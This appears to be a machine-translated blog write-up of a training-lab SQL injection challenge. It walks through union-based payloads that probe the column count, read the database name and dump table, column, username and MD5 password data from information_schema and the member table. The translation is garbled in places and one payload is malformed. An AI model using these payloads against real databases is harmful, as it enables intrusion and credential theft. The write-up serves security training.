当前位置:网站首页>Mozi college SQL injection solution
Mozi college SQL injection solution
2020-11-08 09:40:00 【osc_7bgz0no1】
One · Judgment injection
Input id=1, Normal return . Input id=-1 Returns an error . from This shows that there is injection .
Two · Judgment fields
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 An error at this time , The description has four fields
3、 ... and · Use union Query injection point
Input union select 1,2,3,4
Find out 2,3 For the obvious note point
Four · Use database() Chaku name
Input union select 1,database(),3,4
Find out the name of the library mozhe_Discuz_StormGroup
5、 ... and · Look up the name of the table
Input
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
Query to StormGroup_member,notice
See member, So doubt about the first one . So first look up the first .
6、 ... and · Inquire about StormGroup_member The fields stored in the
Input
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
Query out id,name,password,status
7、 ... and · Query password and user name
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
obtain md5 Encrypted value . To decrypt , Get the code .
If the password is wrong , adopt limit m,n To continue with the inquiry .
8、 ... and · Submit key
After getting the password, you can see key, Copy , Submit .
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
边栏推荐
- Japan PSE certification
- 蓝牙2.4G产品日本MIC认证的测试要求
- Flink的sink实战之一:初探
- Ulab 1.0.0 release
- Cloud Alibabab笔记问世,全网详解仅此一份手慢无
- IOS learning note 2 [problems and solutions encountered during the installation and use of cocopods] [update 20160725]
- Can you do it with only six characters?
- Web novice problem of attacking and defending the world
- Macquarie Bank drives digital transformation with datastex enterprise (DSE)
- scala 中 Future 的简单使用
猜你喜欢
Japan PSE certification
Deeplight Technology Bluetooth protocol SRRC certification services
PX4添加新的应用
shiyou的数值分析作业
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
Improvement of rate limit for laravel8 update
Seven features of Python 3.9
Ulab 1.0.0 release
python_ scrapy_ Fang Tianxia
Application of bidirectional LSTM in outlier detection of time series
随机推荐
洞察——风格注意力网络(SANet)在任意风格迁移中的应用
技术人员该如何接手一个复杂的系统?
接口
Simple use of future in Scala
C++在C的基础上改进了哪些细节
微信昵称emoji表情,特殊表情导致列表不显示,导出EXCEL报错等问题解决!
分布式共识机制
盘点那些你没想到的云计算应用场景(上)
Python3.9的7个特性
[summary series] technical system of Internet server: high performance database index
“1024”征文活动结果新鲜出炉!快来看看是否榜上有名?~~
临近双11,恶补了两个月成功拿下大厂offer,跳槽到阿里巴巴
What details does C + + improve on the basis of C
nvm
VC++指定目录下文件按时间排序输出
vivoY73s和vivoY70s的区别 vivoY73s和vivoY70s哪个值得入手
Is blazor ready to serve the enterprise?
2020-11-05
FORTRAN 77 reads some data from the file and uses the heron iteration formula to solve the problem
软件测试培训班出来好找工作么